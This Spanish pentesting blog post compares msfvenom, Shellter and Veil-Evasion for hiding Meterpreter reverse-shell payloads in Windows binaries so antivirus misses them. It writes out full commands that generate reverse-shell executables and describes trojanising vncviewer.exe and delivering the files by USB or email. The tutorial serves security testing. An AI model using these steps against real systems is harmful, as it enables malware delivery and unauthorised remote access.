Páginas

16 julio, 2020

Shellter y Veil-Evasion: Evasión de antivirus ocultando shellcodes de binarios

Hay diversas técnicas para establecer una sesión hacia una máquina remota. Una de ellas es la generación de un fichero binario que sea ejecutado por la víctima, este binario tendrá un payload configurado que nos proporcionará una shell remota estableciendo una conexión directa o inversa hacia el equipo de la víctima, consiguiendo así una sesión en el mismo contexto de integridad del usuario que ejecutó el binario.

Se trata de un tipo de ataque client-side donde será el usuario final quien interactúe ejecutando el fichero malicioso. La forma de envío de estos ejecutables hacia la máquina remota sin tener una sesión previa puede ser de muchas formas: En el caso de tener acceso físico a la organización distribuir unidades externas usb con el binario esperando que alguien lo ejecute o envío de emails en el que se adjunte el fichero o un hipervínculo que redirige a una web externa donde se descargará (esto suele ser muy habitual). 

El principal "inconveniente" que nos encontramos como pentesters a la hora de ejecutar este método es que estos binarios ya sea por su contenido, sus firmas, morfología, etc. es probable que sea detectado y bloqueado por los fabricantes de antivirus o antimalware. 

Una forma de eludir binarios para evitar ser detectados es aplicar una capa de ocultación en su payload. Los encoders es una opción pero no suelen ser efectivos, sin embargo existen herramientas como Shellter y Veil-Evasión que generan sus propios payloads predefinidos utilizando crypters entre otras técnicas de ofuscación y que los hacen menos detectables para los sistemas de antivirus.

Comparativa de detección por antivirus de binarios con payloads maliciosos

msfvenom

msfvenom se trata de una herramienta que combina msfpayload para la generación de payloads y msfencode para la "ocultación" de payloads. 

Podemos generar binarios de forma sencilla estableciendo una serie de parámetros como puede ser la dirección IP y puerto a la que se conectará la máquina remota cuando ejecute el binario, tipo de arquitectura, payload, enconder (por defecto usará shikata_ga_nai) y caracteres de escape que puedan ocasionar algún tipo de error en la generación del binario.

Para generar un payload que establezca una conexión inversa con un Meterpreter y que sea compatible con sistemas Windows de arquitecturas x86 de 32 bits. 
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.19 LPORT=4444 -e x86/shikata_ga_nai -i 5 -b '\x00' -f exe > shell.exe
Generar binario malicioso payload meterpreter con msfvenom.
Figura 1: Generar binario malicioso payload meterpreter con msfvenom.

En virustotal.com podemos analizar en varios motores de antivirus el binario generado con msfvenom y conocer que antivirus lo detectan como malicioso y cuales no. Como se ve en la captura ha sido analizado por 71 antivirus de los cuales lo han detectado 56.

Tasa de detección de malware en VirusTotal.com de un binario generado con msfvenom.
Figura 2: Tasa de detección de malware en VirusTotal.com de un binario generado con msfvenom.


Shellter Framework

Shellter Framework se trata de una herramienta/framework con la que podemos elegir unos binarios preestablecidos ubicados en /usr/share/windows-binaries el que escojamos se le añadirá un payload con utilizando crypters dificultando así la detección por los antivirus.

Ejecutamos Shellter e indicamos el binario, en este caso vncviewer.exe.

Shellter - Seleccionar binario vncviewer.exe
Figura 3: Shellter - Seleccionar binario vncviewer.exe.

Seleccionamos el tipo de payload ya predefinidos para aplicar en el binario anterior y una IP y puerto local de la máquina atacante para establecer la conexión con la máquina remota cuando ejecute el binario.

Shellter - Seleccionar y configurar payload en el binario vncviewer.exe
Figura 4: Shellter - Seleccionar y configurar payload en el binario vncviewer.exe.

Una vez generado el binario por Shellter comprobamos la detección en virustotal. En este ocasión vemos como el mismo tipo de payload ha sido detectado por 22 antivirus de un total de 69.

Detección del binario malicioso generado con Shellter en VirusTotal.com
Figura 5: Detección del binario malicioso generado con Shellter en VirusTotal.com.


Veil-Evasion Framework

Veil-Evasion Framework se trata de otra alternativa a Shellter. Con la misma idea dispone de una gran cantidad de payload predefinidos en diversos lenguajes, no es necesario escoger un binario como en el caso de Shellter podemos generar nuestro propio binario aplicando el payload que queramos.

Ejecutamos el Veil-Evasion Framework, con use 1 elegimos la modalidad de Evasion, listamos los payloads disponibles con list.

Veil-Framework - Seleccionar tipo y lista de payloads disponibles
Figura 6: Veil-Framework - Seleccionar tipo y lista de payloads disponibles.

Como ejemplo desde la lista seleccionamos el número que corresponde al payload "go/meterpreter/rev_tcp". Con set LHOST y set LPORT establecemos la dirección IP y puerto local a la que se conectará la máquina remota y generamos el binario con generate.

Veil-Framework - Configurar payload y generar binario.
Figura 7: Veil-Framework - Configurar payload y generar binario.

También podemos generar estos binarios de forma no interactiva sin necesidad de interactuar ni ejecutar el framework completamente. Siguiendo el ejemplo anterior sería algo así.
./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 10.0.0.19 --port 4444 -o shell2
Figura 8: Veil-Framework CLI - Configurar y generar binario en una sola línea de instrucción.

Finalmente subimos este binario para analizarlo en virustotal y compararlo con Shellter. La detección de antivirus es de 43 de 70. Aunque es cierto que se trata de otro tipo de payload, la detección es más elevada que en el caso de Shellter.

Detección del binario malicioso generado con Veil-Framework en VirusTotal.com
Figura 9: Detección del binario malicioso generado con Veil-Framework en VirusTotal.com.

Conclusiones

Vistas las comparativas de detección, msfvenom quedaría descartado y Shellter se colocaría en una mejor posición respecto a Veil-Evasion. 

Lógicamente esto no evita el ser detectados pero se trata de una técnica más que podemos aplicar de forma rápida y sencilla para evitar que nuestro binario con una shellcode sea detectado por un número determinado de antivirus pudiendo así facilitar una intrusión a un sistema de forma directa tipo client-side en un ejercicio de penteting.

Saludos!

1 comentario

Entradas Populares